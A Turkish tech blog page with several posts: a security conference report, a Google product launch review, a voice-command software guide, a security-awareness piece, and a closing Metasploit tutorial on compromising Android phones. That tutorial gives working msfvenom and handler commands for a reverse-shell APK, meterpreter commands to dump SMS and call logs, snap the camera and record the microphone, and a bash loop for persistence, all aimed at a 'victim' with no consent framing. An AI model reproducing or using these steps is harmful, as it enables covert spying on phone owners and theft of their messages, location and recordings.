10. Uluslararası Bilgi Güvenliği ve Kriptoloji Konferansı

Bilgi Teknolojileri ve İletişim Kurumu’nda(BTK) Bilgi Güvenliği Derneği’nin organize ettiği 10. Uluslararası Bilgi Güvenliği ve Kriptoloji Konferansı bu sene “Siber Güvenlik ve Yapay Zeka” başlığını seçti. 20-21 Ekim tarihlerinde iki gün süren etkinlik, bu alanda çalışma yapan akademisyenleri, iş adamlarını, öğrencileri ve siyasileri bir araya getirdi. Başbakan, Ulaştırma, Denizcilik ve Haberleşme Bakanı, BTK Başkanı ve diğer başkanların konuşması ile açılış yapıldı. HAVELSAN,ASELSAN,Türk Telekom, Vodafone, Turkcell, Google,Siemens, Innovera, Huawei ve birçok önemli şirket yetkilileri, mühendisleri panellerde ve etkinliklerde konuşmalar yaptı, stantlar oluşturdu.

Açılışın Başbakan Yıldırım‘ın konuşması ile yapıldığı etkinlikte başbakan, 30 bin siber güvenlikçiye ihtiyaç olduğunu ve iş isteyen gençleriçin bir fırsat olduğunu belirtti. “Gençlerimizin daha iyi bir Türkiye’de yetişmesi için bize görev düşüyor. Bu tedbirlerin alınması için üç tane temel unsur var. Birincisi insan. Teknolojiyi hayatın merkezine alan insanı yani kullanıcıyı bilinçlendirmek işin başlangıcı. İkinci unsur yasal düzenlemeler. Üçüncüsü ise teknolojiye yoğunlaşmak.Milli yazılım ve milli donanım gerekiyor. Eğer işin aklı sizde değilse o iş sizin değildir. Beyninin başkasına ait olduğu bir araç size sadakatle hizmet etmeyebilir.” dedi. BTK Başkanı Sayan, 1285 kayıtlı siber güvenlikçi bulunduğunu ve son zamanlarda Türkiye’nin saldırıda bulunma ve saldırıya maruz kalma oranının oldukça düştüğünü belirtti.

 

Daha sonra verilen molada tüm standları gezme fırsatı yakaladım. Pentest şirketleri hizmetlerinden söz etti, Google yeni araçlarını tanıttı, ASELSAN yerli baz istasyonu olan ULAK projesinden bahsetti. Bunların haricinde AtarLAB oldukça ilgimi çekti. Güvenlik araçlarının her gün kaydettiği yüz binlerce log mevcut. Normalde bir güvenlik ekibinin bu logların tamamını analiz etmesi neredeyse imkansız. AtarLAB tüm bu log kayıtlarını analiz ediyor ve gerekli durumda müdahalede bulunuyor. Örneğin şirket çalışanı birisi aynı anda iki bilgisayardan giriş yaptı sisteme. Hemen ikisini de atıyor ve sorumluya iletiyor.Yahut o çalışan binaya hiç giriş yapmadı o gün, şirketin özel bilgilerinden birisini bir diske aktardı, virüslü dosya indirdi…Her birine müdahale edip rapor ediyor. Bu sayede inanılmaz bir iş yükünü ortadan kaldırıyor. CyberMAG isimli siber güvenlik dergisi de oldukça ilgimi çekti. Geçmiş sayılarını aldım. Tamamını okuduktan sonra güçlü ihtimalle abone olacağım dergiye.

Daha sonra Endüstri 4.0 ile alakalı bir konuşma ve panel yapıldı. Bu etkinlikle eş zamanda,farklı salonlarda lise ve ilköğretimler için de siber güvenlik ile alakalı özel bir anlatım yapıldı. Büyük Veri Analizi ve Veri Merkezleri Güvenliği‘nden bahsedildi. SCADA altyapıları, spam sms ve içerikler, ağ güvenliği ve mobil güvenlik ile alakalı konularda da konuşmalar ve paneller düzenlendi. Bunun dışında özel olarak değinmek isteyeceğim bir konuşmacı var. HAVELSAN Mühendisi Murat Karaöz. Sanırım en eğlenceli konuşmayı kendisi gerçekleştirdi. Mobil Güvenlik ve Zararlı Yazılım Analizi konusunda eğitim verecekti ancak bilgisayarını bağlama noktasında sorun yaşadığı için sunum üzerinden gösterdi. Bu dahi oldukça verimliydi. Türkiye’de en çok kullanılan uygulamalarda incelemeler yaparak açıklar tespit etmiş ve mail aracılığı ile bildirmiş. Daha sonra izin verirlerse açık kapandıktan sonra bu konferansta isimlerini belirterek örnek vermek istediğini söylemiş. Ancak neredeyse hepsi yasal yollarla tehdit etmiş. Yalnızca birisi isminin verilmesini kabul etmiş : “Sevgili Bul”. O da muhtemeldir ki salondakiler merak edip uygulamayı indirsin diye düşünmüş. Diğer yandan uygulama üzerinden bedava sipariş verebildiğinden bahseden Karaöz, bazı bankalarda da kritik açıklardan örnekler verdi. Son olarak sahte wifi oluşturarak ağa bağlananların bilgilerini çalmayı gösterdi. Ankara’daki bazı alışveriş merkezlerinde denediğini söyledi. Elde ettiği instagram fotoğraflarını, önemli bilgileri sansürleyerek gösterdi. “Starbucks_Free_Net” şeklinde bir internet ağını kahvecide oluşturduğunda oldukça fazla bağlanan olduğundan söz etti. Son olarak şaşırtıcı bir hareketle etkinlik adına sahte bir wifi ağı oluşturduğunu  ve aynı oltayı salonda da attığını, üstelik yedi kişinin bağlı olduğunu söyledi.

Birinci günü paneller ve konuşmalar ile, ikinci günü eğitimler ile geçen etkinlik her sene Bilgi Güvenliği Derneği tarafından düzenleniyor. Sizlerin de bu etkinliği takip edip katılmasını öneririm. Tüm sektörü bir araya getiren ve işbirliği sağlayan verimli bir etkinlikti. Öğrenci gözü ile bakarsak staj ve okul sonrası iş bulmak için, projelere destek sağlamak ve fikir üretmek için harika bir ortam. Şirketlerin konuda bilinçlenmesi ve şirketi için güvenlik hizmetlerine ulaşması için, güvenlik şirketlerinin kendini tanıtması için de oldukça kaliteli bir zemin. Katılımın her sene artacağına inanıyorum.

Kategoriler
Teknoloji

Google Lansmanında Teknoloji Devi Ürünler

Teknoloji devi Google, yaptığı lansmanda yeni ürünlerinin sunumunu kamuoyuna yaptı. Pixel 2 model telefon, Google Pixelbook, gerçek zamanlı çeviri yapan kulaklık ve akıllı ev araçlarını tanıttı. Lansmanda Samsung ve Apple’a yapılan göndermeler ise oldukça güldürdü. Google CEO’su Sundar Pichai, “En başarılı olduğumuz alanlardaki ürünleri ilk çıkaran biz değildik, ama en başarılı olmayı başardık.” dedi.
 
Google Pixel 2 Red

Pixel 2 karşımıza iki şekilde çıktı. Birisi 4 inç olan hali ve diğeri 5inç olan XL modeli. Daha iyisi için daha büyüğünü almak zorunda değiliz diyen Google’ın CEO’su Apple’a ince bir göndermede daha bulunmuş oldu. Iphone’larda daha iyi özellikler için daha fazla para vererek daha büyük bir model almak gerekirken Pixel 2 modellerinde ekran boyutu dışında hiçbir değişiklik yok. 64 GB veya 128 GB depolama hakkı bulunan kullanıcılara ayrıca sınırsız Google Fotoğraflar ve Google Drive hakkı da hediye edilecek.

 
Akıllı ev sistemi ile entegresi ve asistan özellikleri geliştirilen telefona sonunda su geçirmezlik özelliği de eklenmiş. Kamera kalitesi değerlendirme kuruluşu olan DxOMark’ın derecelendirmesinden 100 üzerinden 98 alarak en tepede yerini alan telefon 12.2 megapiksel arka kamera, 8 megapiksel ön kamera bulunduruyor. Tanıtımda suya ve toza dayanıklılık vurgulandı ve arka kısımda bulunan parmak izi tarama özelliği anlatıldı. Smart lens özelliği ile çekilen fotoğraflardaki yer,dizayn ve diğer bilgilere göre Google üzerinden arama yapılabilecek.4 GB RAM bulunduran cihazların yazılım ve donanım olarak oldukça başarılı bir performans göstereceğine inanılıyor. Daha önce Iphone ile dalga geçen Google, bu modelde kulaklık girişini kaldırarak bluetoothlu kulaklık kullanmaya karar vermiş.Pixel 2’nin fiyatı 2bin 320 lira iken Pixel 2XL’ın fiyatı 3bin 34lira olacak.
 
Google lansmanı çeviri yapan kulaklık
 

Lansmanda tanıtılan diğer ürünlere de kısaca değinecek olursak sesli komut özelliğine sahip ilk dizüstü bilgisayarını tanıtan Google, pixelbook isimli notebooku 10 milimetre inceliğinde, 360 derece döner ve dokunmatik ekranlı hazırlamış. Notebook sadece 1 kilogram ağırlığında ve Chrome OS sisteme sahip. 16GB RAM 512 GB SSD disk bulunduran cihazda i5 veya i7 işlemci seçenekleri mevcut. 3bin 570 liraya satışa çıkacak.Bir diğer ürünü olan iki dil arasında gerçek zamanlı çeviri yapabilen kulaklık ise 568 lira. Diğer yandan akıllı ev asistanları, taşınabilir kameralar ve sanal gerçeklik gözlüğü de lansmanda tanıtıldı.

Ege Olay Gazetesi : http://egeolay.com/yazar-google-lansmaninda-teknoloji-devi-urunler-456.html

Kategoriler
İnceleme

Windows İçin Türkçe Sesli Asistan : GVZKomutANLAR

Sesli asistanlar beni inanılmaz heyecanlandırır. Çok ileri boyutta kullanma hayallerim var fakat bu yazımda ondan bahsetmeyeceğim. Sizlere anlatacağım program aslında oldukça eski. Beni bilişim dünyasına doğru düzgün dalmama sebep olan program. GVZKomutANLAR.
 
Program sizin sesle verdiğiniz komuta karşılık gelen görevi yerine getiriyor. Örneğin Facebook dediğinizde Facebook’a giriyor, Photoshop’u aç dediğinizde onu açıyor, masaüstünü göster diyorsunuz gösteriyor…Örnekleri uzatabiliriz. Ancak sesli bir dönüş veya detaylı işlem yapması mümkün değil. Örnek vermek gerekirse Twitter’dan bir tweet atmanız veya daha komplike işlemler yapmanız mümkün değil. Programa dönelim.
 
 
Açılışta sizi şöyle bir ekran karşılayacak :
 
 
GVZKomutanlar Giriş
 
 
Her kategoride ayrı komut listesi bulunuyor. Üst menüdeki “Komut” seçeneğinden yeni kategori oluşturmak veya yeni komut girmek mümkün.
 

ÇALIŞTIR KOMUTU

 
komut girişi
Komut Adı kısmına dilediğiniz başlığı girebilirsiniz. Söylenişi kısmı ise oldukça önemli.Siz oraya “spotify” yazarsanız bunu anlaması imkansız.Tam olarak doğru şekilde yazmalı ve o şekilde okumalısınız. Programı kullanırken düzgün telaffuz ve sessiz bir ortam yoksa sinir krizi geçirmeniz olası. Okunuşunu yazıyorum bu kısma “Sıpotifay” şeklinde. Alternatif eklemek de mümkün. Örneğin “müzik aç” veya “müzik” kalıplarını ekledim. Aralarına noktalı virgül koyarak ayırmanız gerekiyor.Ancak bir detay daha var, “müzik aç” yazdığım halde tekrar yazmışım. Bu defa boşluk bırakmadan girmişim. Birden fazla kelimeli komut girecekseniz bir de bu şekilde girmeniz programın sizi algılaması için büyük kolaylık. Daha sonra “Çalıştır” komut türünü seçip tamam diyoruz. Diğer komut türlerini de göstereceğim.
 
 
Daha sonra aşağıdaki görseldeki ekran karşınıza çıkacak. Browse seçeneğinden uygulamanızı seçeceksiniz ve “Uygula” butonuna mutlaka basacaksınız. İşlem bu kadar. Bu komut daima çalışacaktır. Şayet çalıştıracağınız şey bir internet sitesi ise http://www.caglar-celik.com” şeklinde Browse yanındaki boşluğa giriyorsunuz. “http://www.” kısmı önemli. Yoksa siteye gitmez.
 

TUŞA BAS KOMUTU

Tuşa bas komutu ile yapabilecekleriniz size kalmış. “Tümünü seç” dediğinizde CTRL+A yapabilirsiniz. “Sekmeyi Kapat” diyerek “CTRL+W” yapabilirsiniz. “Kapat” diyerek “ALT+F4” yapabilirsiniz. Bu şekilde dinlediğiniz müziği başlatıp durdurabilir, sonraki müziğe veya önceki müziğe gidebilir, sesi kapatıp açabilirsiniz. Birçok kombinasyon mevcut. İnternetten araştırmayı size bırakıyorum. Oldukça anlaşılır aşağıdaki görsel. İstediğiniz tuş kombinasyonunu seçiyorsunuz ve okunuşunu giriyorsunuz.

Tuşa bas komutu
 

YAZIYA DÖK KOMUTU

Bu komut ile sık kullandığınız yazıları sesli bir komutla ekrana kolayca yazarsınız.Bunun da kullanımı aşağıdaki görselde gördüğünüz gibi oldukça kolay.
Yazıya Dök Komutu
 

DİĞER AYARLAR

•Dosyalar sekmesinden tanımayı durdur diyerek sesli bir ortamda ya da konuşurken hatalı işlem yapılmasını engelleyebilirsiniz. Ayrıca “uyku modu” derseniz yine program dinlemeyi kesecektir. “Dinleme modu” dediğinizde tekrar aktif hale gelecektir.
 
•Mikrofon ses ayarları kısmında size verilen metni bilgisayara normalde olduğunuz uzaklıktan okuyun. O uygun ayarı yapacaktır.
Mikrofon Ses Seviyesi Ayarı
 
Ses Tanıma Ayarları
• Soldaki menüden ise Güvenilirlik ayarını yapabilirsiniz. Güvenilirlik ayarını arttırdıkça daha doğru telaffuz etmeniz gerek ve ses kalitesi daha iyi olmalı. Ancak söylenen komutu çok yüksek oranda doğru yapacaktır. Azalttığınızda ise telaffuz ve ses kalitesi noktasında biraz daha rahat olabilirsiniz. Ancak bazen hatalı komutlar uygulayabilir. Benim önerim %20 yapın ve komutlarınızı çok kısa seçmemeye özen gösterin. Daha güzeli Çalıştırma modu kısmından CTRL tuşuna basılı iken dinleme ve benzeri seçenekleri kullanabilirsiniz. Böylece her konuşmanızı komut olarak anlamaya çalışmaz. Ancak ben sessiz bir ortamda çalıştığım için her zaman seçeneğini tercih ettim. Diğer seçenekler ise oldukça anlaşılır zaten.
   
ÖNERİ 1 : Macro programları kullanarak daha uzun işlemleri sesli çalıştırmanız mümkün ancak zekice tasarlamak gerekiyor. Her zaman harika sonuçlar vermeyebilir.
 
ÖNERİ 2 : Yazıda da çok vurguladım, tekrar anlatayım. Düzgün telaffuzla ve uygun tonda komutlar söylenmeli. Gireceğiniz komutlar kısa olursa birbirine karışabilir. Pratikliği zedelemeden bir parça uzun komutlar girin.
 
ÖNERİ 3 : Kısayollar hazırlayın. Bunları komut dosyası olarak gösterin. Örneğin bu şekilde sesli olarak bilgisayarı kapatabilir, yeniden başlatabilir veya uyku moduna alabilirsiniz.
 
İNDİRME LİNKLERİ :
 
 
 
Kategoriler
Siber Güvenlik Teknoloji

Herkes İçin Siber Güvenlik

Sıcak bir hava ve deniz kenarındasınız. Şezlonga uzanmışsınız. Tatil harika gidiyor. Bir fotoğraf çekip atıyorsunuz İnstagram’a, beğeniler akıyor. Peki, bunun aslında güvenlik açığı olduğunu düşündünüz mü hiç? Kimileri için senaryo şu şekilde devam ediyor: Teknolojiyi derinlemesine kullanan hırsızlar sizin bu fotoğrafla tatilde olduğunuzu, evinizde olmadığınızı anlıyor. Böylece rahat rahat evinize giriyor.
 
Başka bir örnek. İnternette geziniyorsunuz. Harika bir tişört var. Siz bunu sipariş vermek için kart bilgilerinizi giriyorsunuz. Güvenilir marka canım dalavere olamaz. Ürün kapınıza da geliyor. Fakat daha sonra bir hacker o siteyi hackledikten sonra sizin kredi kartınıza ulaşıyor. Üstelik bunlar herkese açık forumlarda paylaşılıyor rahatça. Hatta bunu yapan 13 yaşında bir çocuk da olabiliyor. Öyle ki sanal ortamdaki hırsızlığın ciddiyetini idrak edemiyor çocuk.
 
Herkes İçin Siber Güvenlik

Daha başka örnek kişisel bilgileriniz hackleniyor ve istihbarat servisleri satın alıyor hackerlardan. “Amancanım ne var benim kişisel bilgilerimde bilmem hangi istihbarat örgütü benim bilgilerimi ne yapacak?” diyorsunuz ya, işte iş ülke genelinde olunca durum kritik oluyor. Facebook, google sizin internet gezintinizi takip ediyor ve reklamları dahi ona göre ayarlıyor. Konum özelliği ile nerede olduğunuzu, mikrofon özelliği ile neler konuştuğunuzu dinliyor. Bunların hepsi bir yerde toplanıyor. Siz işi hafife alırken birileri fotoğraflarınızdan nerede olduğunuzu, hangi makine ile o fotoğrafı çektiğinizi buluyor ve hatta parmak izinizi kopyalıyor.

 
Durum böyle olunca kullanıcıların daha dikkatli olması gerekiyor. Güncel bir antivirüs programı kullanmalısınız. İnternet ortamında her şeyi paylaşmamalısınız, her siteye girmemelisiniz. Telefonda veya bilgisayarda kullandığınız araçlara ne kadar izin verdiğinizi kontrol etmelisiniz.
 
Ege Olay Gazetesi : http://www.egeolay.com/yazar-sosyal-medyanin-guvenilirligi-455.html
Kategoriler
Android Linux Metasploit Siber Güvenlik

Metasploit ile Android Telefona Sızma

Metasploit linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır. Windows üzerinde de kullanmanın bazı yolları var. Ancak bu yazıda onu anlatmayacağım.
 
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
 
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
 

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=1604 R > Desktop/test.apk

Sahte apk oluşturma
 
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Windows’ta komut penceresine ipconfig yazarak öğrenebilirsiniz. Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş arkaplanda.
 
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
 
Daha sonra msfconsole yazarak yavaştan başlıyoruz.
 
metasploit giriş
 
Daha sonra sırası ile aşağıdaki komutları giriyoruz.
  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
  4. set LPORT 1604
  5. exploit
3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
payload seçimi ve ayarları
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla…
 
Exploit

 

 “help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.
 
check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.  
 
Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.

Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.

— — — — — — — — — —
#!/bin/bash
while true
do am start — user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
— — — — — — — — — —
Tüm bunları yaptıktan sonra terminale shell yazın ve dosyayı yüklediğiniz konuma giderek “sh dosyaismi.sh”yazarak çalıştırın. Bundan sonra uygulama kapansa da siz istediğiniz işlemleri yapmaya devam edebilirsiniz.